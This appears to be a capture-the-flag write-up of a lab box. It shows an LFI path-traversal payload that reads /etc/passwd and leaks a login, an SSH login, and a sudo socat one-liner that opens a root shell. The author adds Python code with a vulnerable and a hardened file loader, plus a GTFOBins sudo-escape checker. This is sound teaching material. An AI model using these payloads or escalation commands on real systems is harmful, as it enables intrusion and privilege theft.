Nmap scan
kali@kali:~$ nmap -T4 -A 10.10.216.80
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-14 11:14 EST
Nmap scan report for 10.10.216.80
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
| 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
1030/tcp filtered iad1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.65 seconds
Head to http://10.10.216.80 in a browser. Notice the URL of the article page: http://10.10.216.80/article?name=lfiattack. The name parameter looks like it selects which file the server reads and renders, which is exactly the shape a local file inclusion (LFI) bug takes.
We can test for LFI by replacing the value after the equals sign with a path traversal payload that targets the /etc/passwd file:
../../../../../etc/passwd
Each ../ steps up one directory. Once enough of them are chained to reach the filesystem root (extra ones past / are harmless, since /.. is still /), the rest of the path selects /etc/passwd, and the server reads it exactly as it would read an article.
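To make the mechanics concrete, here is an added example (my code, not the blog's application, whose handler we never see) of an article loader with the same flaw beside a hardened version that resolves the path and refuses anything outside the articles directory. The demo tree is constructed inside a temporary directory with a fake etc/passwd next to articles/, so the payload is ../etc/passwd rather than the deeper chain used against the box; the depth is the only difference.

```python
import os
import tempfile


def read_article_vulnerable(articles_dir, name):
    """Mirrors the flawed pattern: user input concatenated into a filesystem path.

    os.path.join happily follows ../ segments, and discards articles_dir
    entirely if name is absolute, so any readable file can be fetched.
    """
    with open(os.path.join(articles_dir, name)) as f:
        return f.read()


def read_article_hardened(articles_dir, name):
    """Resolve the requested path and refuse anything that escapes articles_dir."""
    base = os.path.realpath(articles_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath collapses ../ and symlinks; commonpath then tells us whether
    # the result still lives under base.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("rejected: %r resolves outside %s" % (name, base))
    with open(target) as f:
        return f.read()


def traversal_rejected(articles_dir, name):
    """True if the hardened loader refuses the name (helper for the checks below)."""
    try:
        read_article_hardened(articles_dir, name)
    except ValueError:
        return True
    return False


def build_demo_tree():
    """Constructed stand-in for the box: articles/ beside a fake etc/passwd.

    Returns the path of the articles directory (hypothetical layout; the
    real server's directory structure is not known from the page).
    """
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    articles = os.path.join(root, "articles")
    os.makedirs(articles)
    with open(os.path.join(articles, "lfiattack"), "w") as f:
        f.write("How to do LFI (constructed article body)\n")
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "falconfeast:x:1000:1000::/home/falconfeast:/bin/bash\n")
    return articles


if __name__ == "__main__":
    articles = build_demo_tree()
    # The legitimate request works either way.
    print(read_article_hardened(articles, "lfiattack"))
    # The traversal payload leaks the passwd file through the flawed loader...
    print(read_article_vulnerable(articles, "../etc/passwd"))
    # ...and is refused by the hardened one.
    print("rejected:", traversal_rejected(articles, "../etc/passwd"))
```

The check is on the resolved path, not on the string: stripping ../ from the input is a common mistake, since encodings and absolute paths slip past it, whereas realpath plus a prefix comparison judges where the name actually lands.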
Below we can see that we are able to retrieve the /etc/passwd file and render it in the web browser.
You can view the page source for a cleaner view of the file.
Notice there is a commented line which shows the password:
#falconfeastXXXXXXXXX
I have blocked out the password.
kali@kali:~$ ssh falconfeast@10.10.216.80
The authenticity of host '10.10.216.80 (10.10.216.80)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.216.80' (ECDSA) to the list of known hosts.
falconfeast@10.10.216.80's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

System information as of Sat Nov 14 22:26:33 IST 2020

System load: 0.01 Processes: 85
Usage of /: 35.2% of 9.78GB Users logged in: 0
Memory usage: 65% IP address for eth0: 10.10.216.80
Swap usage: 0%

 * Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
3 packages can be updated.
3 updates are security updates.
Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$
From here we can easily grab the first user flag.
Next, we need to escalate our privileges to root.
Using the command sudo -l we can see which commands our current user may run as root, and whether a password is required for them.
falconfeast@inclusion:/usr/bin$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat
So falconfeast can run /usr/bin/socat as root, and NOPASSWD means no password is needed to do so.
A simple Google search leads me to the GTFOBins page on socat, which has a Sudo section.
Running the one-liner from that section drops us straight into a root shell.
Here we rooted the system and got our root flag!
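As an added example (my code, not part of the room or of GTFOBins), here is a small helper that parses sudo -l output into structured entries and flags the ones that a GTFOBins Sudo entry turns into a root shell. The sample text is constructed from the sudo -l output above plus a second, password-required line so the parser has both shapes to handle; the socat one-liner it emits is the Sudo entry from https://gtfobins.github.io/gtfobins/socat/.

```python
import re

# Constructed sample: the sudo -l output from the box, with one extra
# (ALL : ALL) line added so that a password-required entry is present too.
SAMPLE_SUDO_L = """\
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
    (ALL : ALL) /usr/bin/vim
"""

# One sudoers line as sudo -l prints it: "(runas[:group]) [TAG: ...] cmd[, cmd]".
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Sudo one-liners from GTFOBins, keyed by binary name. Only the entry this
# writeup used is included; extend it from the GTFOBins pages as needed.
GTFOBINS_SUDO = {
    "socat": "sudo socat stdin exec:/bin/sh",
}


def parse_sudo_l(text):
    """Return a list of {runas, nopasswd, command} dicts from sudo -l output."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        # Everything before this header is Defaults noise we do not need.
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        # "(root)" or "(ALL : ALL)": the part before the colon is the run-as user.
        runas = m.group("runas").split(":")[0].strip()
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip(": ")}
        for cmd in m.group("cmds").split(","):
            entries.append({
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return entries


def root_shell_candidates(entries):
    """(command, nopasswd, one-liner) for entries runnable as root with a known GTFOBins escape."""
    found = []
    for e in entries:
        if e["runas"] not in ("root", "ALL"):
            continue
        binary = e["command"].rsplit("/", 1)[-1]
        if binary in GTFOBINS_SUDO:
            found.append((e["command"], e["nopasswd"], GTFOBINS_SUDO[binary]))
    return found


if __name__ == "__main__":
    for command, nopasswd, one_liner in root_shell_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        print("%s (%s) -> %s" % (command, "no password" if nopasswd else "password", one_liner))
```

On the box the check collapses to a single line, but the same helper is handy on a larger sudoers listing, where the interesting entry is easy to miss among dozens of harmless ones; the nopasswd flag matters because it tells you whether the escape works without knowing the user's password.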